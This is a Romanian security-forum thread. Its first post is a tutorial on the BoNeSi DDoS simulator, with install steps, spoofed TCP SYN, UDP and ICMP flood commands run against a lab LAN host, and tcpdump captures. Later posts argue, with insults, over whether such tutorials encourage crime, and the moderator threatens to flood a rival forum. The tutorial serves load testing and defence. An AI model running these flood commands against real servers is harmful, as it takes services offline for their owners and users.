Simularea atacurilor DDoS cu Bonesi

[aelius]

Ce este BoNeSi ?

BoNeSi este un tool pentru simularea atacurilor DDoS (distributed denial of service) pentru a studia efectele unui atac DDoS cat si posibilitatea de filtrare (sau minimizare a efectelor) unui astfel de atac.

Am testat acest tool pe un server local cu Debian utilizand ca SRC IP 10.0.0.7 iar ca DST IP 10.0.0.8 pe care am un server ce ruleaza FreeBSD. La primul test, cel cu protocol tcp, capacitatea atacului a fost de 5096.83 flows/s. Curios este faptul ca desi rata la inbound era de doar 10,16 Mbps, serverul web ce rula pe DST era inaccesibil. La al II-lea test, cel cu protocol udp, capacitatea atacului a fost de 16602.50 flows/s. iar rata la inbound de 3,3 Mbps, iar la al III-lea test, cel cu icmp echo request, capacitatea atacului a fost de 7248.00 flows/s.

Cele doua servere folosite la acest test, sunt conectate in LAN printr-un switch Allied Telesis iar link-ul este de 100mbps. In toate testele (tcp, icmp, udp) sursele de atac sunt alterate (spoofed) cu adresele ip din fisierul “50k-bots”

Mentionez ca pe sistemul atacat era instalat apache2, prefork (default) si nu erau modificari la ListenBacklog.

Instalare pe debian:

tex work # apt-get install libnet1-dev libpcap-dev
tex work # wget http://bonesi.googlecode.com/files/bonesi-0.1.1.tar.gz
tex work # tar zxvf bonesi-0.1.1.tar.gz
tex work # cd bonesi-0.1.1
tex bonesi-0.1.1 # ./configure && make
tex bonesi-0.1.1 # cp src/bonesi .

Utilizare:

Test I:   Pentru syn spoofed (tcp attack): ./bonesi --ips=50k-bots --protocol=tcp -d eth0 10.0.0.8:80
Test II:  Pentru udp spoofed: ./bonesi --ips=50k-bots --protocol=udp -d eth0 10.0.0.8:80
Test III: Pentru icmp spoofed (echo request): ./bonesi --ips=50k-bots --protocol=icmp -d eth0 10.0.0.8:80

Vizualizare pachete cu tcpdump la primul test (5 linii):

02:21:23.681982 IP 88.126.89.159.22458 > 10.0.0.8.80: Flags [S], seq 1237269533, win 4096, options [mss 1402,nop,wscale 0,nop,nop,TS val 1365282408 ecr 0,sackOK,eol], length 0
02:21:23.682074 IP 122.105.124.102.24571 > 10.0.0.8.80: Flags [S], seq 829903001, win 4096, options [mss 1460,nop,sackOK,eol], length 0
02:21:23.682115 IP 240.179.162.42.14539 > 10.0.0.8.80: Flags [S], seq 333938234, win 4096, options [mss 1516,nop,sackOK,eol], length 0
02:21:23.682154 IP 251.224.133.235.14748 > 10.0.0.8.80: Flags [S], seq 1230917056, win 4096, options [mss 1516,nop,sackOK,eol], length 0
02:21:23.682195 IP 48.44.25.215.26626 > 10.0.0.8.80: Flags [S], seq 802302864, win 4096, options [mss 1430,sackOK,TS val 1840537518 ecr 0,nop,wscale 0], length 0

Vizualizare pachete cu tcpdump la al II-lea test (5 linii):

02:28:40.917828 IP 141.162.25.189.34536 > 10.0.0.8.80: UDP, length 32
02:28:40.918783 IP 155.243.83.223.18623 > 10.0.0.8.80: UDP, length 32
02:28:40.918791 IP 255.46.11.142.29747 > 10.0.0.8.80: UDP, length 32
02:28:40.918797 IP 145.217.172.116.33624 > 10.0.0.8.80: UDP, length 32
02:28:40.918804 IP 246.242.203.210.10015 > 10.0.0.8.80: UDP, length 32

Vizualizare pachete cu tcpdump la al III-lea test (5 linii):

02:35:49.156760 IP 11.132.139.168 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40
02:35:49.156770 IP 35.68.7.119 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40
02:35:49.157715 IP 136.87.254.149 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40
02:35:49.157722 IP 12.23.245.154 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40
02:35:49.157727 IP 91.33.156.53 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40

Note:

- Din cate puteti observa, testele sunt facute in LAN. Atacurile DoS/DDoS sunt ilegale. Va sfatuiesc sa nu faceti teste catre retele care nu va apartin (sau cel putin, nu dupa ip-urile voastre)

- Am specificat la inceput la ce anume poate fi de folos (tot din acest motiv, am facut captura la pachete)

[mengele]

util <> BoNeSi posted: 1 month, 3 weeks ago

Asta esti tot tu?

[aelius]

util <> BoNeSi

Asta esti tot tu?

Salut,

Nu, fura astia tot ce prind. https://www.rtfm.ro/ddos/bonesi/ Asta este articolul original, scris de mine. Nu fur tutoriale, am aproape 15 ani de linux in spate.

Se poate vedea ca individul ala a postat tot cu hostname "tex"

Asta este sistemul atacat in exemplul de mai sus.

hp ~ # ifconfig |grep broad
        inet 10.0.0.8 netmask 0xffffff00 broadcast 10.0.0.255
hp ~ #

Edited January 21, 2012 by aelius

[mengele]

Te cred. Puteau sa bage si ei un "source by" ceva...dar na....lamekids.

PS: vad niste " la inceput si la sfarsit Omul cica citeaza....dar din cine?

[aelius]

http://forum.satmultimedia.ro/forum/95-linux/18153-util-lg-bonesi.html
http://forum.satmultimedia.ro/forum/95-linux/19246-util-lg-detectarea-atacurilor-supernova-cu-snort.html
http://forum.satmultimedia.ro/forum/95-linux/19245-util-lg-dezactivare-cpu-pe-linux.html
http://forum.satmultimedia.ro/forum/95-linux/19244-util-lg-reboot-a-linux-machine--different-way.html
http://forum.satmultimedia.ro/forum/95-linux/19243-util-lg-schimbarea-adresei-mac-sub-platforma-linux.html
http://forum.satmultimedia.ro/forum/95-linux/19242-util-lg-crontab-configurare-si-functionare.html
http://forum.satmultimedia.ro/forum/95-linux/19241-util-lg-mac-address-lookup-in-bash.html
http://forum.satmultimedia.ro/forum/95-linux/19240-util-lg-utilizare-tcpdump.html
http://forum.satmultimedia.ro/forum/95-linux/19238-util-lg-monitorizarea-traficului-cu-tcpdump.html
http://forum.satmultimedia.ro/forum/95-linux/19236-util-lg-despre-tcpip--clasificarea-adreselor-ip.html
http://forum.satmultimedia.ro/forum/95-linux/18686-util-lg-restart-fortat-linux.html
http://forum.satmultimedia.ro/forum/95-linux/18157-util-lg-firewall-minimal-pentru-linux.html
http://forum.satmultimedia.ro/forum/95-linux/18155-util-lg-protectie-apache-impotriva-slowloris.html
http://forum.satmultimedia.ro/forum/95-linux/18154-util-lg-mic-tutorial-hping3--firewall-test.html
http://forum.satmultimedia.ro/forum/95-linux/18151-util-lg-minimizarea-efectelor-atacurilor-syn-pe-freebsd.html
http://forum.satmultimedia.ro/forum/95-linux/18150-util-lg-minimizarea-efectelor-atacurilor-syn.html

Eu le dau forumul jos, lua-le-as neamul la pula. Jumate de forum este copiat.

Edited January 21, 2012 by aelius

[mengele]

Nu cred ca are rost sa iti futi nervii si timpul cu toti retardatii...intradevar sunt o gramada de materiale copiate de pe aici..

[mengele]

Lasa-i ma ca plang

Firefox can't establish a connection to the server at forum.satmultimedia.ro.

[aelius]

Ma pis pe ei si pe romargul lor. I-am zis de zeci de ori pizdei de Radu Tofan ca tine toti hotii acolo. O sa-i pachetez fiecare ip futut in parte. Sa puna mana pe munca si sa lase laba.

[mengele]

este o poveste lunga cu acest Romarg ... no comment ca o sa puta prea rau pe urma...

[aelius]

Cam aiurea ma simt ca intreb, dar google nu mi`a oferit prea multe informatii.

Primesc porcaria asta,

Warning: There is noch File with useragent names! The user-agent:
 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)
will be used.
libnet_init() failed: libnet_init(): UID or EUID of 0 required

Folosesc Ubuntu 12.04.

I. "There is noch File with useragent names!"

R. Este o lista cu browsere (user agents)

I. "libnet_init() failed: libnet_init(): UID or EUID of 0 required"

R. uid/euid/gid 0 - Adica iti trebuie Super User. (root) - Explicatie: un utilizator obisnuit nu poate crea socketi RAW sau ICMP (ca si in cazul binar-ului ping, acesta este executat ca “root”, nicidecum sub uid/gid-ul userului) ***

Edited May 14, 2012 by aelius

[giv]

- Din cate puteti observa, testele sunt facute in LAN. Atacurile DoS/DDoS sunt ilegale. Va sfatuiesc sa nu faceti teste catre retele care nu va apartin (sau cel putin, nu dupa ip-urile voastre)

Pai atunci hai sa nu mai aratam asa ceva.

[aelius]

Pai atunci hai sa nu mai aratam asa ceva.

Dude, eu imi fac datoria sa spun pentru ca sunt noobi care dau flood de pe pc-urile de acasa. Daca nu vrei sa vezi tutoriale, iti pot da ban. Ce vrei sa aratam, scam-uri de facebook si carduri ?

Nu-ti place ceva, il ocolesti. Daca vezi o harca de cacat in drum, te opresti s-o iei la palme ?

BoNeSi este un tool pentru simularea atacurilor DDoS (distributed denial of service) pentru a studia efectele unui atac DDoS cat si posibilitatea de filtrare (sau minimizare a efectelor) unui astfel de atac.

Daca vrei sa-l folosesti in alt scop, este treaba ta.

Edited May 16, 2012 by aelius

[giv]

Pentru ca mi-ai dat warning la un topic al tau tin sa iti spun ca a modera propriul topic si a sterge sau da warn la cei care nu sunt de acord cu tine este cel putin imoral si iti bat obrazul.

Eu ti-am spus doar ca aceste tip de mesaje incurajeaza frauda. E ca si cum ai arata cum se impusca un om si ai spune la altul sa nu faca...

Precum ai scris in postul anterior se vede clar ca si tu ai mesaj offtopic raspunzand la un mesaj pe care il califici drept offtopic si solicit sa iti si dai si tie un warn in ideea simetriei de drepturi aici pe forum fata de obligatii ca sa ne demonstrezi ca esti corect.

Na ca am mai facut un mesaj offtopic. Treaba ta daca imi dai ban sau nu. Ceea ce faci tu se numeste abuz nu moderare. Userii trebuie sa fie respectati nu admolestati. Daca tu crezi ca a-ti cita spusele si a raspunde la topicul tau este offtopic atunci inseamna ca porcul zboara cu 1500 km/h.

Edited May 16, 2012 by giv

[alexu]

giv tu cunosti sensul cuvintelor , sau le arunci asa , doar sa fie ?

Ce mama naibii are a face frauda cu flood-ul ?

tex a realizat acest tutorial pentru cei care vor sa-si testeze server-ul pentru a-i imbunatati securitatea .

E ca si cum ai spune ca unul care vinde cutite ar trebui arestat pentru ca incita la violenta , deoarece sunt si cretini in lumea asta care folosesc acele ustensile pentru a omora lumea .

Absolut orice lucru , pe lumea asta , poate fi folosit si in scopuri rele, daca atat te duce capu` .

[giv]

E ca si cum ai spune ca unul care vinde cutite ar trebui arestat pentru ca incita la violenta , deoarece sunt si cretini in lumea asta care folosesc acele ustensile pentru a omora lumea .

Absolut orice lucru , pe lumea asta , poate fi folosit si in scopuri rele, daca atat te duce capu` .

Amice esti intr-o confuze. Scuza-ma ca iti spun asta.

Il poti aresta pe vanzatorul de cutite daca iti arata cum se poate omori un om si extrapoland la cele de mai sus exact acest lucru se demonstreaza cu conditia de a "nu se pune in practica".

Nu te supara pe mine....

[Guest Kovalski]

@giv esti degeaba as putea sa iti enumar un sir de cretinisme care le-ai scris dar prefer doar sa iti spun ca esti incuiat la minte.

tex a incercat doar sa ajute prin acest tutorial daca tu esti pocnit la cerebel ar trebui sa te abtii de la comentarii si remarci inutile.

ps. daca incerci sa te dai zmeu te umplu de respect din cap pana in picioare

asta asa ca fapt divers.

[giv]

@giv esti degeaba as putea sa iti enumar un sir de cretinisme care le-ai scris dar prefer doar sa iti spun ca esti incuiat la minte.

tex a incercat doar sa ajute prin acest tutorial daca tu esti pocnit la cerebel ar trebui sa te abtii de la comentarii si remarci inutile.

ps. daca incerci sa te dai zmeu te umplu de respect din cap pana in picioare

asta asa ca fapt divers.

Limbajul pe care il folosesti spune multe despre nivelul tau. Majoritatea forumului este plin de asemenea manifestari. De regula cine zice ala e (dupa cum bine zice proverbul).

Te-as provoca la un concurs de inteligenta sa demonstrezi ca esti precum sustii.

Ultimul post in aces thread. Discutati ce vreti. Rest ignore!

[Andrei]

@giv Renunta la aceste tentativele de a crea o impresie de superioritate. Nu impresionezi pe nimeni. Daca mergem pe ideea ta, nu ar trebui sa publicam nici un soi de unealta care atinge chiar si tangential domeniul INFOSEC. Uite ca treaba asta se intampla in toate statele si pana in momentul de fata nu exista reglementari puse in practica cu privire la detinerea si utilizarea acestor aplicatii in conditii controlate.

Acest lucru se intampla pentru ca realizatorii si cei care distribuie informatia o fac cu un scop educational. Personal nu ma doare capul daca o aplicatie de a mea sau a altcuiva provoaca daune atata timp cat eu am realizat acea aplicatie avand in minte doar contribuirea la domeniu si la tehnologia existenta sau evidentierea unor probleme de securitate.

E ca si cum ai spune nu cumparati cutite ca sunt arme albe. Cu ce iti mai tai painea daca ele sunt interzise?

[BlackJokerKode]

Nu va mai certati aiurea.Forum-ul are anumite tematici,stabilite de foarte mult timp.Nu va fi schimbat peste noapte ca unii au anumite obiectii.Cui nu ii convine tool-ul sa nu il foloseasca.

ps: Orice lucru si orice program poate deveni arma,daca stii cum sa il folosesti.